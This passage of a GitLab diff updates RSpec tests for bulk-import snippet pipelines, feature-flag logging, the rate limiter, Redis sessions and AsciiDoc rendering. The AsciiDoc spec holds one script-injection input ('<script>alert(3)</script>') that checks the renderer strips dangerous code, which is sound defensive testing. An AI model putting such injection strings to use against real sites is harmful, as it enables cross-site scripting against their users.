user_id: user.id, + awardable_type: expected_award['awardable_type'], + created_at: DateTime.parse(expected_award['created_at']), + updated_at: DateTime.parse(expected_award['updated_at'])) + end + end + + context 'with notes', :freeze_time do + # To properly emulate a fixture that is expected to be read from a file, we dump a json + # object, then parse it right away. We expected that some attrs like Datetimes be + # converted to Strings. + let(:exported_snippet) { Gitlab::Json.parse(note.noteable.attributes.merge('notes' => notes).to_json) } + let(:note) { create(:note_on_project_snippet, :with_attachment) } + let(:notes) { [note.attributes.merge('author' => { 'name' => note.author.name })] } + + it 'restores the notes' do + snippet_note = project.snippets.last.notes.first + author_name = note.author.name + note_updated_at = exported_snippet['notes'].first['updated_at'].split('.').first + + expect(snippet_note).to have_attributes( + note: note.note + "\n\n *By #{author_name} on #{note_updated_at} (imported from GitLab)*", + noteable_type: note.noteable_type, + author_id: user.id, + updated_at: note.updated_at, + line_code: note.line_code, + commit_id: note.commit_id, + system: note.system, + st_diff: note.st_diff, + updated_by_id: user.id) + end + end + end +end diff --git a/spec/lib/bulk_imports/projects/pipelines/snippets_repository_pipeline_spec.rb b/spec/lib/bulk_imports/projects/pipelines/snippets_repository_pipeline_spec.rb new file mode 100644 index 00000000000..9897e74ec7b --- /dev/null +++ b/spec/lib/bulk_imports/projects/pipelines/snippets_repository_pipeline_spec.rb @@ -0,0 +1,168 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Projects::Pipelines::SnippetsRepositoryPipeline do + let(:user) { create(:user) } + let(:project) { create(:project) } + let(:bulk_import) { create(:bulk_import, user: user) } + let(:bulk_import_configuration) { create(:bulk_import_configuration, bulk_import: bulk_import) } + let!(:matched_snippet) { create(:snippet, project: project, created_at: "1981-12-13T23:59:59Z")} + let(:entity) do + create( + :bulk_import_entity, + :project_entity, + project: project, + bulk_import: bulk_import_configuration.bulk_import, + source_full_path: 'source/full/path', + destination_name: 'My Destination Project', + destination_namespace: project.full_path + ) + end + + let(:tracker) { create(:bulk_import_tracker, entity: entity) } + let(:context) { BulkImports::Pipeline::Context.new(tracker) } + + subject(:pipeline) { described_class.new(context) } + + let(:http_url_to_repo) { 'https://example.com/foo/bar/snippets/42.git' } + let(:data) do + [ + { + 'title' => matched_snippet.title, + 'httpUrlToRepo' => http_url_to_repo, + 'createdAt' => matched_snippet.created_at.to_s + } + ] + end + + let(:page_info) do + { + 'next_page' => 'eyJpZCI6IjIyMDA2OTYifQ', + 'has_next_page' => false + } + end + + let(:extracted_data) { BulkImports::Pipeline::ExtractedData.new(data: data, page_info: page_info) } + + describe 'extractor' do + it 'is a GraphqlExtractor with Graphql::GetSnippetRepositoryQuery' do + expect(described_class.get_extractor).to eq( + klass: BulkImports::Common::Extractors::GraphqlExtractor, + options: { + query: BulkImports::Projects::Graphql::GetSnippetRepositoryQuery + }) + end + end + + describe '#run' do + let(:validation_response) { double(Hash, 'error?': false) } + + before do + allow_next_instance_of(BulkImports::Common::Extractors::GraphqlExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(extracted_data) + end + + allow_next_instance_of(Snippets::RepositoryValidationService) do |repository_validation| + allow(repository_validation).to receive(:execute).and_return(validation_response) + end + end + + shared_examples 'skippable snippet' do + it 'does not create snippet repo' do + pipeline.run + + expect(Gitlab::GlRepository::SNIPPET.repository_for(matched_snippet).exists?).to be false + end + end + + context 'when a snippet is not matched' do + let(:data) do + [ + { + 'title' => 'unmatched title', + 'httpUrlToRepo' => http_url_to_repo, + 'createdAt' => matched_snippet.created_at.to_s + } + ] + end + + it_behaves_like 'skippable snippet' + end + + context 'when httpUrlToRepo is empty' do + let(:data) do + [ + { + 'title' => matched_snippet.title, + 'createdAt' => matched_snippet.created_at.to_s + } + ] + end + + it_behaves_like 'skippable snippet' + end + + context 'when a snippet matches' do + context 'when snippet url is valid' do + it 'creates snippet repo' do + expect { pipeline.run } + .to change { Gitlab::GlRepository::SNIPPET.repository_for(matched_snippet).exists? }.to true + end + + it 'updates snippets statistics' do + allow_next_instance_of(Repository) do |repository| + allow(repository).to receive(:fetch_as_mirror) + end + + service = double(Snippets::UpdateStatisticsService) + + expect(Snippets::UpdateStatisticsService).to receive(:new).with(kind_of(Snippet)).and_return(service) + expect(service).to receive(:execute) + + pipeline.run + end + + it 'fetches snippet repo from url' do + expect_next_instance_of(Repository) do |repository| + expect(repository) + .to receive(:fetch_as_mirror) + .with("https://oauth2:#{bulk_import_configuration.access_token}@example.com/foo/bar/snippets/42.git") + end + + pipeline.run + end + end + + context 'when url is invalid' do + let(:http_url_to_repo) { 'http://0.0.0.0' } + + it_behaves_like 'skippable snippet' + end + + context 'when snippet is invalid' do + let(:validation_response) { double(Hash, 'error?': true) } + + before do + allow_next_instance_of(Repository) do |repository| + allow(repository).to receive(:fetch_as_mirror) + end + end + + it 'does not leave a hanging SnippetRepository behind' do + pipeline.run + + expect(SnippetRepository.where(snippet_id: matched_snippet.id).exists?).to be false + end + + it 'does not call UpdateStatisticsService' do + expect(Snippets::UpdateStatisticsService).not_to receive(:new) + + pipeline.run + end + + it_behaves_like 'skippable snippet' + end + end + end +end diff --git a/spec/lib/bulk_imports/projects/stage_spec.rb b/spec/lib/bulk_imports/projects/stage_spec.rb index e7670085f60..81cbdcae9d1 100644 --- a/spec/lib/bulk_imports/projects/stage_spec.rb +++ b/spec/lib/bulk_imports/projects/stage_spec.rb @@ -2,20 +2,32 @@ require 'spec_helper' +# Any new stages must be added to +# `ee/spec/lib/ee/bulk_imports/projects/stage_spec.rb` as well. RSpec.describe BulkImports::Projects::Stage do let(:pipelines) do [ [0, BulkImports::Projects::Pipelines::ProjectPipeline], [1, BulkImports::Projects::Pipelines::RepositoryPipeline], + [1, BulkImports::Projects::Pipelines::ProjectAttributesPipeline], [2, BulkImports::Common::Pipelines::LabelsPipeline], [2, BulkImports::Common::Pipelines::MilestonesPipeline], + [2, BulkImports::Common::Pipelines::BadgesPipeline], [3, BulkImports::Projects::Pipelines::IssuesPipeline], + [3, BulkImports::Projects::Pipelines::SnippetsPipeline], + [4, BulkImports::Projects::Pipelines::SnippetsRepositoryPipeline], [4, BulkImports::Common::Pipelines::BoardsPipeline], [4, BulkImports::Projects::Pipelines::MergeRequestsPipeline], [4, BulkImports::Projects::Pipelines::ExternalPullRequestsPipeline], [4, BulkImports::Projects::Pipelines::ProtectedBranchesPipeline], + [4, BulkImports::Projects::Pipelines::CiPipelinesPipeline], + [4, BulkImports::Projects::Pipelines::ProjectFeaturePipeline], + [4, BulkImports::Projects::Pipelines::ContainerExpirationPolicyPipeline], + [4, BulkImports::Projects::Pipelines::ServiceDeskSettingPipeline], [5, BulkImports::Common::Pipelines::WikiPipeline], [5, BulkImports::Common::Pipelines::UploadsPipeline], + [5, BulkImports::Projects::Pipelines::AutoDevopsPipeline], + [5, BulkImports::Projects::Pipelines::PipelineSchedulesPipeline], [6, BulkImports::Common::Pipelines::EntityFinisher] ] end diff --git a/spec/lib/error_tracking/collector/payload_validator_spec.rb b/spec/lib/error_tracking/collector/payload_validator_spec.rb index 852cf9eac6c..ab5ec448dff 100644 --- a/spec/lib/error_tracking/collector/payload_validator_spec.rb +++ b/spec/lib/error_tracking/collector/payload_validator_spec.rb @@ -3,16 +3,18 @@ require 'spec_helper' RSpec.describe ErrorTracking::Collector::PayloadValidator do + let(:validator) { described_class.new } + describe '#valid?' do RSpec.shared_examples 'valid payload' do - it 'returns true' do - expect(described_class.new.valid?(payload)).to be_truthy + specify do + expect(validator).to be_valid(payload) end end RSpec.shared_examples 'invalid payload' do - it 'returns false' do - expect(described_class.new.valid?(payload)).to be_falsey + specify do + expect(validator).not_to be_valid(payload) end end @@ -28,6 +30,12 @@ RSpec.describe ErrorTracking::Collector::PayloadValidator do it_behaves_like 'valid payload' end + context 'python payload in repl' do + let(:payload) { Gitlab::Json.parse(fixture_file('error_tracking/python_event_repl.json')) } + + it_behaves_like 'valid payload' + end + context 'browser payload' do let(:payload) { Gitlab::Json.parse(fixture_file('error_tracking/browser_event.json')) } diff --git a/spec/lib/feature/definition_spec.rb b/spec/lib/feature/definition_spec.rb index 21120012927..2f95f8eeab7 100644 --- a/spec/lib/feature/definition_spec.rb +++ b/spec/lib/feature/definition_spec.rb @@ -161,6 +161,41 @@ RSpec.describe Feature::Definition do end end + describe '.for_upcoming_milestone?' do + using RSpec::Parameterized::TableSyntax + + let(:definition) do + Feature::Definition.new("development/enabled_feature_flag.yml", + name: :enabled_feature_flag, + type: 'development', + milestone: milestone, + default_enabled: false) + end + + before do + allow(Feature::Definition).to receive(:definitions) do + { definition.key => definition } + end + + allow(Gitlab).to receive(:version_info).and_return(Gitlab::VersionInfo.parse(current_milestone)) + end + + subject { definition.for_upcoming_milestone? } + + where(:ctx, :milestone, :current_milestone, :expected) do + 'no milestone' | nil | '1.0.0' | false + 'upcoming milestone - major' | '2.3' | '1.9.999' | true + 'upcoming milestone - minor' | '2.3' | '2.2.999' | true + 'current milestone' | '2.3' | '2.3.999' | true + 'past milestone - major' | '1.9' | '2.3.999' | false + 'past milestone - minor' | '2.2' | '2.3.999' | false + end + + with_them do + it {is_expected.to be(expected)} + end + end + describe '.valid_usage!' do before do allow(described_class).to receive(:definitions) do @@ -215,7 +250,42 @@ RSpec.describe Feature::Definition do end end - describe '.defaul_enabled?' do + describe '.log_states?' do + using RSpec::Parameterized::TableSyntax + + let(:definition) do + Feature::Definition.new("development/enabled_feature_flag.yml", + name: :enabled_feature_flag, + type: 'development', + milestone: milestone, + log_state_changes: log_state_change, + default_enabled: false) + end + + before do + allow(Feature::Definition).to receive(:definitions) do + { definition.key => definition } + end + + allow(Gitlab).to receive(:version_info).and_return(Gitlab::VersionInfo.new(10, 0, 0)) + end + + subject { Feature::Definition.log_states?(key) } + + where(:ctx, :key, :milestone, :log_state_change, :expected) do + 'When flag does not exist' | :no_flag | "0.0" | true | false + 'When flag is old, and logging is not forced' | :enabled_feature_flag | "0.0" | false | false + 'When flag is old, but logging is forced' | :enabled_feature_flag | "0.0" | true | true + 'When flag is current' | :enabled_feature_flag | "10.0" | true | true + 'Flag is upcoming' | :enabled_feature_flag | "10.0" | true | true + end + + with_them do + it { is_expected.to be(expected) } + end + end + + describe '.default_enabled?' do subject { described_class.default_enabled?(key) } context 'when feature flag exist' do diff --git a/spec/lib/feature_spec.rb b/spec/lib/feature_spec.rb index 58e7292c125..82580d5d700 100644 --- a/spec/lib/feature_spec.rb +++ b/spec/lib/feature_spec.rb @@ -127,6 +127,10 @@ RSpec.describe Feature, stub_feature_flags: false do end describe '.enabled?' do + before do + allow(Feature).to receive(:log_feature_flag_states?).and_return(false) + end + it 'returns false for undefined feature' do expect(described_class.enabled?(:some_random_feature_flag)).to be_falsey end @@ -179,6 +183,35 @@ RSpec.describe Feature, stub_feature_flags: false do expect(described_class.enabled?(:a_feature, default_enabled: fake_default)).to eq(fake_default) end + context 'logging is enabled', :request_store do + before do + allow(Feature).to receive(:log_feature_flag_states?).and_call_original + + definition = Feature::Definition.new("development/enabled_feature_flag.yml", + name: :enabled_feature_flag, + type: 'development', + log_state_changes: true, + default_enabled: false) + + allow(Feature::Definition).to receive(:definitions) do + { definition.key => definition } + end + + described_class.enable(:feature_flag_state_logs) + described_class.enable(:enabled_feature_flag) + described_class.enabled?(:enabled_feature_flag) + end + + it 'does not log feature_flag_state_logs' do + expect(described_class.logged_states).not_to have_key("feature_flag_state_logs") + end + + it 'logs other feature flags' do + expect(described_class.logged_states).to have_key(:enabled_feature_flag) + expect(described_class.logged_states[:enabled_feature_flag]).to be_truthy + end + end + context 'cached feature flag', :request_store do let(:flag) { :some_feature_flag } @@ -491,6 +524,82 @@ RSpec.describe Feature, stub_feature_flags: false do end end + describe '.log_feature_flag_states?' do + let(:log_state_changes) { false } + let(:milestone) { "0.0" } + let(:flag_name) { :some_flag } + let(:definition) do + Feature::Definition.new("development/#{flag_name}.yml", + name: flag_name, + type: 'development', + milestone: milestone, + log_state_changes: log_state_changes, + default_enabled: false) + end + + before do + Feature.enable(:feature_flag_state_logs) + Feature.enable(:some_flag) + + allow(Feature).to receive(:log_feature_flag_states?).and_return(false) + allow(Feature).to receive(:log_feature_flag_states?).with(:feature_flag_state_logs).and_call_original + allow(Feature).to receive(:log_feature_flag_states?).with(:some_flag).and_call_original + + allow(Feature::Definition).to receive(:definitions) do + { definition.key => definition } + end + end + + subject { described_class.log_feature_flag_states?(flag_name) } + + context 'when flag is feature_flag_state_logs' do + let(:milestone) { "14.6" } + let(:flag_name) { :feature_flag_state_logs } + let(:log_state_changes) { true } + + it { is_expected.to be_falsey } + end + + context 'when flag is old' do + it { is_expected.to be_falsey } + end + + context 'when flag is old while log_state_changes is not present ' do + let(:definition) do + Feature::Definition.new("development/#{flag_name}.yml", + name: flag_name, + type: 'development', + milestone: milestone, + default_enabled: false) + end + + it { is_expected.to be_falsey } + end + + context 'when flag is old but log_state_changes is true' do + let(:log_state_changes) { true } + + it { is_expected.to be_truthy } + end + + context 'when flag is new and not feature_flag_state_logs' do + let(:milestone) { "14.6" } + + it { is_expected.to be_truthy } + end + + context 'when milestone is nil' do + let(:definition) do + Feature::Definition.new("development/#{flag_name}.yml", + name: flag_name, + type: 'development', + default_enabled: false) + end + + it { is_expected.to be_falsey } + end + end + context 'caching with stale reads from the database', :use_clean_rails_redis_caching, :request_store, :aggregate_failures do let(:actor) { stub_feature_flag_gate('CustomActor:5') } let(:another_actor) { stub_feature_flag_gate('CustomActor:10') } diff --git a/spec/lib/generators/gitlab/usage_metric_definition/redis_hll_generator_spec.rb b/spec/lib/generators/gitlab/usage_metric_definition/redis_hll_generator_spec.rb index e497551bc3f..4cba9732c22 100644 --- a/spec/lib/generators/gitlab/usage_metric_definition/redis_hll_generator_spec.rb +++ b/spec/lib/generators/gitlab/usage_metric_definition/redis_hll_generator_spec.rb @@ -28,8 +28,14 @@ RSpec.describe Gitlab::UsageMetricDefinition::RedisHllGenerator, :silence_stdout weekly_metric_definition_path = Dir.glob(File.join(temp_dir, 'metrics/counts_7d/*i_test_event_weekly.yml')).first monthly_metric_definition_path = Dir.glob(File.join(temp_dir, 'metrics/counts_28d/*i_test_event_monthly.yml')).first - expect(YAML.safe_load(File.read(weekly_metric_definition_path))).to include("key_path" => "redis_hll_counters.test_category.i_test_event_weekly") - expect(YAML.safe_load(File.read(monthly_metric_definition_path))).to include("key_path" => "redis_hll_counters.test_category.i_test_event_monthly") + weekly_metric_definition = YAML.safe_load(File.read(weekly_metric_definition_path)) + monthly_metric_definition = YAML.safe_load(File.read(monthly_metric_definition_path)) + + expect(weekly_metric_definition).to include("key_path" => "redis_hll_counters.test_category.i_test_event_weekly") + expect(monthly_metric_definition).to include("key_path" => "redis_hll_counters.test_category.i_test_event_monthly") + + expect(weekly_metric_definition["instrumentation_class"]).to eq('RedisHLLMetric') + expect(monthly_metric_definition["instrumentation_class"]).to eq('RedisHLLMetric') end context 'with ee option' do @@ -49,9 +55,11 @@ RSpec.describe Gitlab::UsageMetricDefinition::RedisHllGenerator, :silence_stdout expect(weekly_metric_definition).to include("key_path" => "redis_hll_counters.test_category.i_test_event_weekly") expect(weekly_metric_definition["distribution"]).to include('ee') + expect(weekly_metric_definition["instrumentation_class"]).to eq('RedisHLLMetric') expect(monthly_metric_definition).to include("key_path" => "redis_hll_counters.test_category.i_test_event_monthly") expect(monthly_metric_definition["distribution"]).to include('ee') + expect(monthly_metric_definition["instrumentation_class"]).to eq('RedisHLLMetric') end end end diff --git a/spec/lib/generators/gitlab/usage_metric_definition_generator_spec.rb b/spec/lib/generators/gitlab/usage_metric_definition_generator_spec.rb index b67425ae012..6a30bcd0e2c 100644 --- a/spec/lib/generators/gitlab/usage_metric_definition_generator_spec.rb +++ b/spec/lib/generators/gitlab/usage_metric_definition_generator_spec.rb @@ -7,6 +7,7 @@ RSpec.describe Gitlab::UsageMetricDefinitionGenerator, :silence_stdout do let(:key_path) { 'counts_weekly.test_metric' } let(:dir) { '7d' } + let(:class_name) { 'Count' } let(:temp_dir) { Dir.mktmpdir } before do @@ -33,7 +34,7 @@ RSpec.describe Gitlab::UsageMetricDefinitionGenerator, :silence_stdout do let(:metric_definition_path) { Dir.glob(File.join(temp_dir, 'metrics/counts_7d/*_test_metric.yml')).first } it 'creates a metric definition file using the template' do - described_class.new([key_path], { 'dir' => dir }).invoke_all + described_class.new([key_path], { 'dir' => dir, 'class_name' => class_name }).invoke_all expect(YAML.safe_load(File.read(metric_definition_path))).to eq(sample_metric) end end @@ -48,14 +49,14 @@ RSpec.describe Gitlab::UsageMetricDefinitionGenerator, :silence_stdout do end it 'creates a metric definition file using the template' do - described_class.new([key_path], { 'dir' => dir, 'ee': true }).invoke_all + described_class.new([key_path], { 'dir' => dir, 'class_name' => class_name, 'ee': true }).invoke_all expect(YAML.safe_load(File.read(metric_definition_path))).to eq(sample_metric) end end end describe 'Validation' do - let(:options) { [key_path, '--dir', dir] } + let(:options) { [key_path, '--dir', dir, '--class_name', class_name] } subject { described_class.start(options) } @@ -93,7 +94,7 @@ RSpec.describe Gitlab::UsageMetricDefinitionGenerator, :silence_stdout do describe 'Name suggestions' do it 'adds name key to metric definition' do expect(::Gitlab::Usage::Metrics::NamesSuggestions::Generator).to receive(:generate).and_return('some name') - described_class.new([key_path], { 'dir' => dir }).invoke_all + described_class.new([key_path], { 'dir' => dir, 'class_name' => class_name }).invoke_all metric_definition_path = Dir.glob(File.join(temp_dir, 'metrics/counts_7d/*_test_metric.yml')).first expect(YAML.safe_load(File.read(metric_definition_path))).to include("name" => "some name") @@ -104,7 +105,7 @@ RSpec.describe Gitlab::UsageMetricDefinitionGenerator, :silence_stdout do let(:key_paths) { ['counts_weekly.test_metric', 'counts_weekly.test1_metric'] } it 'creates multiple files' do - described_class.new(key_paths, { 'dir' => dir }).invoke_all + described_class.new(key_paths, { 'dir' => dir, 'class_name' => class_name }).invoke_all files = Dir.glob(File.join(temp_dir, 'metrics/counts_7d/*_metric.yml')) expect(files.count).to eq(2) diff --git a/spec/lib/gitlab/analytics/cycle_analytics/aggregated/records_fetcher_spec.rb b/spec/lib/gitlab/analytics/cycle_analytics/aggregated/records_fetcher_spec.rb index 045cdb129cb..55ba6e56237 100644 --- a/spec/lib/gitlab/analytics/cycle_analytics/aggregated/records_fetcher_spec.rb +++ b/spec/lib/gitlab/analytics/cycle_analytics/aggregated/records_fetcher_spec.rb @@ -41,6 +41,19 @@ RSpec.describe Gitlab::Analytics::CycleAnalytics::Aggregated::RecordsFetcher do it_behaves_like 'match returned records' end + context 'when intervalstyle setting is configured to "postgres"' do + it 'avoids nil durations' do + # ActiveRecord cannot parse the 'postgres' intervalstyle, it returns nil + # The setting is rolled back after the test case. + Analytics::CycleAnalytics::IssueStageEvent.connection.execute("SET LOCAL intervalstyle='postgres'") + + records_fetcher.serialized_records do |relation| + durations = relation.map(&:total_time) + expect(durations).to all(be > 0) + end + end + end + context 'when sorting by end event ASC' do let(:expected_issue_ids) { [issue_2.iid, issue_1.iid, issue_3.iid] } diff --git a/spec/lib/gitlab/anonymous_session_spec.rb b/spec/lib/gitlab/anonymous_session_spec.rb index 245ca02e91a..64186e9003a 100644 --- a/spec/lib/gitlab/anonymous_session_spec.rb +++ b/spec/lib/gitlab/anonymous_session_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe Gitlab::AnonymousSession, :clean_gitlab_redis_shared_state do +RSpec.describe Gitlab::AnonymousSession, :clean_gitlab_redis_sessions do let(:default_session_id) { '6919a6f1bb119dd7396fadc38fd18d0d' } let(:additional_session_id) { '7919a6f1bb119dd7396fadc38fd18d0d' } @@ -16,7 +16,7 @@ RSpec.describe Gitlab::AnonymousSession, :clean_gitlab_redis_shared_state do it 'adds session id to proper key' do subject.count_session_ip - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.get("session:lookup:ip:gitlab2:127.0.0.1").to_i).to eq 1 end end @@ -25,7 +25,7 @@ RSpec.describe Gitlab::AnonymousSession, :clean_gitlab_redis_shared_state do freeze_time do subject.count_session_ip - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.ttl("session:lookup:ip:gitlab2:127.0.0.1")).to eq(24.hours.to_i) end end @@ -36,7 +36,7 @@ RSpec.describe Gitlab::AnonymousSession, :clean_gitlab_redis_shared_state do subject.count_session_ip new_anonymous_session.count_session_ip - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.get("session:lookup:ip:gitlab2:127.0.0.1").to_i).to eq(2) end end @@ -45,7 +45,7 @@ RSpec.describe Gitlab::AnonymousSession, :clean_gitlab_redis_shared_state do describe '#stored_sessions' do it 'returns all anonymous sessions per ip' do - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.set("session:lookup:ip:gitlab2:127.0.0.1", 2) end @@ -54,13 +54,13 @@ RSpec.describe Gitlab::AnonymousSession, :clean_gitlab_redis_shared_state do end it 'removes obsolete lookup through ip entries' do - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.set("session:lookup:ip:gitlab2:127.0.0.1", 2) end subject.cleanup_session_per_ip_count - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.exists("session:lookup:ip:gitlab2:127.0.0.1")).to eq(false) end end diff --git a/spec/lib/gitlab/application_context_spec.rb b/spec/lib/gitlab/application_context_spec.rb index ecd68caba79..5ecec978017 100644 --- a/spec/lib/gitlab/application_context_spec.rb +++ b/spec/lib/gitlab/application_context_spec.rb @@ -152,6 +152,38 @@ RSpec.describe Gitlab::ApplicationContext do end end end + + context 'when using a runner project' do + let_it_be_with_reload(:runner) { create(:ci_runner, :project) } + + it 'sets project path from runner project' do + context = described_class.new(runner: runner) + + expect(result(context)).to include(project: runner.runner_projects.first.project.full_path) + end + + context 'when the runner serves multiple projects' do + before do + create(:ci_runner_project, runner: runner, project: create(:project)) + end + + it 'does not set project path' do + context = described_class.new(runner: runner) + + expect(result(context)).to include(project: nil) + end + end + end + + context 'when using an instance runner' do + let_it_be(:runner) { create(:ci_runner, :instance) } + + it 'does not sets project path' do + context = described_class.new(runner: runner) + + expect(result(context)).to include(project: nil) + end + end end describe '#use' do diff --git a/spec/lib/gitlab/application_rate_limiter_spec.rb b/spec/lib/gitlab/application_rate_limiter_spec.rb index c74bcf8d678..20c89eab5f5 100644 --- a/spec/lib/gitlab/application_rate_limiter_spec.rb +++ b/spec/lib/gitlab/application_rate_limiter_spec.rb @@ -2,37 +2,37 @@ require 'spec_helper' -RSpec.describe Gitlab::ApplicationRateLimiter do +RSpec.describe Gitlab::ApplicationRateLimiter, :clean_gitlab_redis_rate_limiting do let_it_be(:user) { create(:user) } let_it_be(:project) { create(:project) } - subject { described_class } - - describe '.throttled?', :clean_gitlab_redis_rate_limiting do - let(:rate_limits) do - { - test_action: { - threshold: 1, - interval: 2.minutes - }, - another_action: { - threshold: 2, - interval: 3.minutes - } + let(:rate_limits) do + { + test_action: { + threshold: 1, + interval: 2.minutes + }, + another_action: { + threshold: 2, + interval: 3.minutes } - end + } + end - before do - allow(described_class).to receive(:rate_limits).and_return(rate_limits) - end + subject { described_class } + + before do + allow(described_class).to receive(:rate_limits).and_return(rate_limits) + end + describe '.throttled?' do context 'when the key is invalid' do context 'is provided as a Symbol' do context 'but is not defined in the rate_limits Hash' do it 'raises an InvalidKeyError exception' do key = :key_not_in_rate_limits_hash - expect { subject.throttled?(key) }.to raise_error(Gitlab::ApplicationRateLimiter::InvalidKeyError) + expect { subject.throttled?(key, scope: [user]) }.to raise_error(Gitlab::ApplicationRateLimiter::InvalidKeyError) end end end @@ -42,7 +42,7 @@ RSpec.describe Gitlab::ApplicationRateLimiter do it 'raises an InvalidKeyError exception' do key = rate_limits.keys[0].to_s - expect { subject.throttled?(key) }.to raise_error(Gitlab::ApplicationRateLimiter::InvalidKeyError) + expect { subject.throttled?(key, scope: [user]) }.to raise_error(Gitlab::ApplicationRateLimiter::InvalidKeyError) end end @@ -50,7 +50,7 @@ RSpec.describe Gitlab::ApplicationRateLimiter do it 'raises an InvalidKeyError exception' do key = 'key_not_in_rate_limits_hash' - expect { subject.throttled?(key) }.to raise_error(Gitlab::ApplicationRateLimiter::InvalidKeyError) + expect { subject.throttled?(key, scope: [user]) }.to raise_error(Gitlab::ApplicationRateLimiter::InvalidKeyError) end end end @@ -89,6 +89,17 @@ RSpec.describe Gitlab::ApplicationRateLimiter do expect(subject.throttled?(:another_action, scope: scope)).to eq(true) end end + + it 'allows peeking at the current state without changing its value' do + travel_to(start_time) do + expect(subject.throttled?(:test_action, scope: scope)).to eq(false) + 2.times do + expect(subject.throttled?(:test_action, scope: scope, peek: true)).to eq(false) + end + expect(subject.throttled?(:test_action, scope: scope)).to eq(true) + expect(subject.throttled?(:test_action, scope: scope, peek: true)).to eq(true) + end + end end context 'when using ActiveRecord models as scope' do @@ -104,6 +115,20 @@ RSpec.describe Gitlab::ApplicationRateLimiter do end end + describe '.peek' do + it 'peeks at the current state without changing its value' do + freeze_time do + expect(subject.peek(:test_action, scope: [user])).to eq(false) + expect(subject.throttled?(:test_action, scope: [user])).to eq(false) + 2.times do + expect(subject.peek(:test_action, scope: [user])).to eq(false) + end + expect(subject.throttled?(:test_action, scope: [user])).to eq(true) + expect(subject.peek(:test_action, scope: [user])).to eq(true) + end + end + end + describe '.log_request' do let(:file_path) { 'master/README.md' } let(:type) { :raw_blob_request_limit } diff --git a/spec/lib/gitlab/asciidoc_spec.rb b/spec/lib/gitlab/asciidoc_spec.rb index ac29bb22865..7200ff3c4db 100644 --- a/spec/lib/gitlab/asciidoc_spec.rb +++ b/spec/lib/gitlab/asciidoc_spec.rb @@ -96,10 +96,10 @@ module Gitlab it "does not convert dangerous fenced code with inline script into HTML" do input = '```mypre"><script>alert(3)</script>' output = - if Feature.enabled?(:use_cmark_renderer) - "<div>\n<div>\n<pre class=\"code highlight js-syntax-highlight language-plaintext\" lang=\"plaintext\" v-pre=\"true\"><code></code></pre>\n</div>\n</div>" + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) + "<div>\n<div>\n<div class=\"gl-relative markdown-code-block js-markdown-code\">\n<pre class=\"code highlight js-syntax-highlight language-plaintext\" lang=\"plaintext\" v-pre=\"true\"><code></code></pre>\n<copy-code></copy-code>\n</div>\n</div>\n</div>" else - "<div>\n<div>\n<pre class=\"code highlight js-syntax-highlight language-plaintext\" lang=\"plaintext\" v-pre=\"true\"><code><span id=\"LC1\" class=\"line\" lang=\"plaintext\">\"></span></code></pre>\n</div>\n</div>" + "<div>\n<div>\n<div class=\"gl-relative markdown-code-block js-markdown-code\">\n<pre class=\"code highlight js-syntax-highlight language-plaintext\" lang=\"plaintext\" v-pre=\"true\"><code><span id=\"LC1\" class=\"line\" lang=\"plaintext\">\"></span></code></pre>\n<copy-code></copy-code>\n</div>\n</div>\n</div>" end expect(render(input, context)).to include(output) @@ -365,7 +365,10 @@ module Gitlab output = <<~HTML <div> <div> + <div class="gl-relative markdown-code-block js-markdown-code"> <pre class="code highlight js-syntax-highlight language-javascript" lang="javascript" v-pre="true"><code><span id="LC1" class="line" lang="javascript"><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">hello world</span><span class="dl">'</span><span class="p">)</span></span></code></pre> + <copy-code></copy-code> + </div> </div> </div> HTML @@ -392,11 +395,14 @@ module Gitlab <div> <div>class.cpp</div> <div> + <div class="gl-relative markdown-code-block js-markdown-code"> <pre class="code highlight js-syntax-highlight language-cpp" lang="cpp" v-pre="true"><code><span id="LC1" class="line" lang="cpp"><span class="cp">#include <stdio.h></span></span> <span id="LC2" class="line" lang="cpp"></span> <span id="LC3" class="line" lang="cpp"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">5</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span></span> <span id="LC4" class="line" lang="cpp"> <span class="n">std</span><span class="o">::</span><span class="n">cout</span><span class="o"><<</span><span class="s">"*"</span><span class="o"><<</span><span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span></span> <span id="LC5" class="line" lang="cpp"><span class="p">}</span></span></code></pre> + <copy-code></copy-code> + </div> </div> </div> HTML diff --git a/spec/lib/gitlab/auth/user_access_denied_reason_spec.rb b/spec/lib/gitlab/auth/user_access_denied_reason_spec.rb index 102d6fba97f..e5bc51edc2d 100644 --- a/spec/lib/gitlab/auth/user_access_denied_reason_spec.rb +++ b/spec/lib/gitlab/auth/user_access_denied_reason_spec.rb @@ -26,6 +26,7 @@ RSpec.describe Gitlab::Auth::UserAccessDeniedReason do it { is_expected.to match /must accept the Terms of Service/ } it { is_expected.to include(user.username) } + it { is_expected.to include(Gitlab.config.gitlab.url) } end context 'when the user is internal' do diff --git a/spec/lib/gitlab/auth_spec.rb b/spec/lib/gitlab/auth_spec.rb index 5ec6e23774a..32e647688ff 100644 --- a/spec/lib/gitlab/auth_spec.rb +++ b/spec/lib/gitlab/auth_spec.rb @@ -259,30 +259,48 @@ RSpec.describe Gitlab::Auth, :use_clean_rails_memory_store_caching do context 'while using OAuth tokens as passwords' do let(:user) { create(:user) } - let(:token_w_api_scope) { Doorkeeper::AccessToken.create!(application_id: application.id, resource_owner_id: user.id, scopes: 'api') } let(:application) { Doorkeeper::Application.create!(name: 'MyApp', redirect_uri: 'https://app.com', owner: user) } shared_examples 'an oauth failure' do it 'fails' do - expect(gl_auth.find_for_git_client("oauth2", 